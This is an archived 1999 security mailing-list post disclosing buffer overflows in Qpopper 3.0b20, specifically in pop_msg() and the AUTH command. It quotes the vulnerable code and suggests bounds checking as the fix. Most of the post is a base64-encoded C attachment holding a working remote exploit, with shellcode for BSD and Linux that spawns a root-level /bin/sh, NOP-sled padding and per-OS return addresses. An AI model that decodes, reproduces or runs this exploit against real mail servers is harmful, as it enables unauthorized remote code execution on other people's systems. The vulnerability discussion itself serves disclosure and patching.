This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --2110849577-815205743-943993525=:26891 Content-Type: TEXT/PLAIN; charset=US-ASCII I found this overflow myself earlier this month. Seems someone else recently found it before Qualcomm was able to issue a patch. The 2.x series is not vunlnerable because AUTH is not yet supported and the error returned by attempting to use AUTH does not call pop_msg() with any user input. There is also another overflow besides the AUTH overflow which can occur if a valid username and password are first entered also occuring in pop_msg(). pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20: pop_msg(p,POP_FAILURE, "Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand); No bounds checking is done on the attempted subcommand. It is interesting to note that in qpop 2.53, a similar line is used, but with limits on the string length! pop_msg(p,POP_FAILURE, "Unknown command: \"%.128s %.128s\".",p->pop_command, p->pop_subcommand); I guess Qualcomm did not continue development of Qpopper directly from the 2.53 series, but rewrote code from scratch and/or based it on earlier code. As a solution, pop_msg() should also do bounds checking, and not make the calling line responsible for it (althought that's good practice too). Attached is my original exploit that works on *BSD and Linux. (Solaris is NOT vulnerable to the AUTH overflow). Slight modification is needed on one line as the comments say. This exploit will actually work on the majority of machines then. Qualcomm: you have already received my working exploit with no modification needed. Let's hope for an official patch soon. - sk8@lucid-solutions.com http://www.lucid-solutions.com --2110849577-815205743-943993525=:26891 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="q3combo-public.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.9911301525250.26891at_private> Content-Description: Content-Disposition: attachment; filename="q3combo-public.c" LyogUVBPUCB2ZXJzaW9uIDMuMGIyMCBhbmQgbG93ZXIgYmV0YSB2ZXJzaW9u cyBSRU1PVEUgRVhQTE9JVA0KICogY29tYmluYXRpb24gKkJTRCBhbmQgTGlu dXgNCiAqDQogKiBzazhAbHVjaWQtc29sdXRpb25zLmNvbQ0KICogaHR0cDov L3d3dy5sdWNpZC1zb2x1dGlvbnMuY29tDQogKg0KICogSSBoYXZlIHdyaXR0 ZW4gdGhpcyB0byB0ZXN0IGFuZCBkZW1vbnN0cmF0ZSB2dWxuZXJhYmlsaXRp ZXMgb24gY2xpZW50cycgDQogKiBzeXN0ZW1zIG9ubHkuICANCiAqDQogKiAh ISEhISEhISEhRE8gTk9UIGRpc3RyaWJ1dGUhISEhISEhISEhDQogKiAoYXQg bGVhc3Qgbm90IHVudGlsIFF1YWxjb21tIGlzc3VlcyBhIHBhdGNoKQ0KICog DQogKiBZb3UgbWF5IG9ubHkgdXNlIHRoaXMgdG8gdGVzdCB5b3VyIG93biBz eXN0ZW0ocykuDQogKiBJIGFtIG5vdCByZXNwb25zaWJsZSBmb3IgYW55IHVu YXV0aG9yaXplZCB1c2Ugb2YgdGhpcyBwcm9ncmFtLg0KICoNCiAqIHRlc3Rl ZCBvbiBCU0RJIDMuMC80LjAuMSwgRnJlZUJTRCAyLjIuOC8zLjMsIExpbnV4 IA0KICogDQogKiBTaW5jZSBwb3BwZXIgaXMgdXN1YWxseSBjb21waWxlZCBi eSB0aGUgYWRtaW4sIHJldHVybiBhZGRyZXNzZXMgd2lsbCB2YXJ5LA0KICog YnV0IEkgaGF2ZSBpbmNsdWRlZCBjb21tb24gdmFsdWVzLiAgWW91IG1heSBo YXZlIHRvIHByb3ZpZGUgYW4gb2Zmc2V0DQogKiB0byBnZXQgaXQgdG8gd29y ayBvbiB5b3VyIHN5c3RlbS4NCiAqIA0KICogSSB3cm90ZSB0aGUgZXhwbG9p dCBuZWFyIHRoZSBiZWdpbm5pbmcgb2YgTm92ZW1iZXIgMTk5OSwgYW5kIHVu bGlrZSBzb21lIA0KICogb3RoZXIgZXhwbG9pdHMgSSd2ZSBzZWVuIHNpbmNl LCB0aGlzIG9uZSB3b3JrcyBldmVuIG9uIExpbnV4IGJveGVzIG9uIHdoaWNo IA0KICogaW5ldGQgd2FzIG5vdCBzdGFydGVkIGZyb20gYSBzaGVsbCBwcm9t cHQuDQogKg0KICogT25lIG1pbm9yIGNoYW5nZSBtdXN0IGJlIG1hZGUgZm9y IHRoaXMgdG8gZXhwbG9pdCB0aGUgQVVUSCBvdmVyZmxvdy4NCiAqDQogKiBV c2FnZTogSWYgeW91IGNhbid0IGZpZ3VyZSBvdXQgaG93IHRvIHVzZSB0aGlz LCB5b3Ugc2hvdWxkbid0DQogKiAJICBiZSBpbiB0aGUgc2VjdXJpdHkgYnVz aW5lc3MuICAodHJ5IG5ldGNhdCkNCiAqLw0KDQojaW5jbHVkZSA8c3RkaW8u aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzeXMvdGltZS5o Pg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5o Pg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0 L2luLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCg0KdW5zaWduZWQgaW50IE5P UD0weDkwOw0KDQp1bnNpZ25lZCBsb25nIG9mZnNldD0wOyAvKiBkZWZhdWx0 IG9mZnNldCAqLw0KDQpjaGFyIGJzZHNjW109DQoJIlx4ZWJceDMyXHg1ZVx4 MzFceGRiXHg4OVx4NWVceDA3XHg4OVx4NWVceDEyXHg4OVx4NWVceDE3Ig0K CSJceDg4XHg1ZVx4MWNceDhkXHgxZVx4ODlceDVlXHgwZVx4MzFceGMwXHhi MFx4M2JceDhkXHg3ZSINCgkiXHgwZVx4ODlceGZhXHg4OVx4ZjlceGJmXHgx MFx4MTBceDEwXHgxMFx4MjlceDdlXHhmNVx4ODkiDQoJIlx4Y2ZceGViXHgw MVx4ZmZceDYyXHg2MVx4NjNceDYwXHhlYlx4MWJceGU4XHhjOVx4ZmZceGZm Ig0KCSJceGZmL2Jpbi9zaFx4YWFceGFhXHhhYVx4YWFceGZmXHhmZlx4ZmZc eGJiXHhiYlx4YmJceGJiIg0KCSJceGNjXHhjY1x4Y2NceGNjXHg5YVx4YWFc eGFhXHhhYVx4YWFceDA3XHhhYSI7DQoNCmNoYXIgbGludXhzY1tdPQ0KCSJc eGViXHgyMlx4NWVceDg5XHhmM1x4ODlceGY3XHg4M1x4YzdceDA3XHgzMVx4 YzBceGFhIg0KCSJceDg5XHhmOVx4ODlceGYwXHhhYlx4ODlceGZhXHgzMVx4 YzBceGFiXHhiMFx4MDhceDA0Ig0KCSJceDAzXHhjZFx4ODBceDMxXHhkYlx4 ODlceGQ4XHg0MFx4Y2RceDgwXHhlOFx4ZDlceGZmIg0KCSJceGZmXHhmZi9i aW4vc2giOw0KDQpzdHJ1Y3QgdmVyc2lvbiB7DQoJaW50IG51bTsNCgljaGFy KiBzeXN0eXBlOw0KCWludCBidWZmZXJfbGVuZ3RoOw0KCWxvbmcgYWRkcmVz czsNCn07DQoNCnN0cnVjdCB2ZXJzaW9uIHZlcmxpc3RbXSA9IHsNCgl7MCwg IkJTREkgMi54LzMueCwgRnJlZUJTRCAyLngiLCAxMDAxLCAweGVmYmZkNTZj fSwNCgl7MSwgIkJTREkgNC54IiwgMTAwMSwgMHg4MDQ3NTY0fSwNCgl7Miwg IkZyZWVCU0QgMy54IiwgMTAwMSwgMHhiZmJmZDNkY30sDQoJezMsICJMaW51 eCIsIDk5MCwgMHhiZmZmZDMwNH0sDQoJezAsIDAsIDAsIDB9DQp9Ow0KDQpp bnQgbWFpbihpbnQgYXJnYywgY2hhcioqIGFyZ3YpIHsNCgljaGFyKiBidWZm ZXIsICpzaGVsbGNvZGU7DQoJaW50IGJ1ZmxlbiwgaT0wLCB2ZXIsIHJldGFk ZHIsIGFsaWduPTA7DQoJc3RydWN0IHNvY2thZGRyX2luIHNvY2thZGRyOw0K CXN0cnVjdCBob3N0ZW50KiBob3N0Ow0KDQoJaWYgKGFyZ2MgPCAyKSB7DQoJ CXByaW50ZigiVXNhZ2U6ICVzIHZlcnNpb24gW29mZnNldF1cbiIsIGFyZ3Zb MF0pOw0KCQlpPS0xOw0KCQlwcmludGYoIlxuQXZhaWxhYmxlIHZlcnNpb25z OlxuIik7DQoJCXdoaWxlICh2ZXJsaXN0WysraV0uc3lzdHlwZSkgIHsNCgkJ ICBwcmludGYoIiAgICVkOiAlc1xuIiwgdmVybGlzdFtpXS5udW0sIHZlcmxp c3RbaV0uc3lzdHlwZSk7DQoJCX0NCgkJcHJpbnRmKCJcbiIpOw0KCQlleGl0 KC0xKTsNCgl9DQoNCgl2ZXI9YXRvaShhcmd2WzFdKTsNCglpZiAoYXJnYyA+ IDIpIHsNCgkJb2Zmc2V0PWF0b2koYXJndlsyXSk7DQoJfQ0KCWlmIChzdHJz dHIodmVybGlzdFt2ZXJdLnN5c3R5cGUsICJMaW51eCIpKSB7DQoJCXNoZWxs Y29kZT1saW51eHNjOw0KCQlhbGlnbj0yOw0KCX0NCgllbHNlIHNoZWxsY29k ZT1ic2RzYzsNCg0KCWJ1Zmxlbj12ZXJsaXN0W3Zlcl0uYnVmZmVyX2xlbmd0 aDsNCglyZXRhZGRyPXZlcmxpc3RbdmVyXS5hZGRyZXNzOw0KDQoJYnVmZmVy PShjaGFyKiltYWxsb2MoYnVmbGVuKTsNCgltZW1zZXQoYnVmZmVyLCBOT1As IGJ1Zmxlbik7IA0KCW1lbWNweShidWZmZXIsICJBVVRIICIsIDQpOw0KCW1l bWNweShidWZmZXIrODAwLCBzaGVsbGNvZGUsIHN0cmxlbihzaGVsbGNvZGUp KTsNCglmb3IgKGk9ODAwK3N0cmxlbihzaGVsbGNvZGUpK2FsaWduOyBpPCBi dWZsZW4tNDsgaSs9NCkgew0KCQkqKCh1bnNpZ25lZCBsb25nIGludCAqKSZi dWZmZXJbaV0pPXJldGFkZHIrb2Zmc2V0Ow0KCX0NCglidWZmZXJbYnVmbGVu LTJdPSdcbic7DQoJYnVmZmVyW2J1Zmxlbi0xXT0nXG4nOw0KDQoJcHJpbnRm KCIlc1xuIiwgYnVmZmVyKTsNCn0NCg== --2110849577-815205743-943993525=:26891--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:15:08 PDT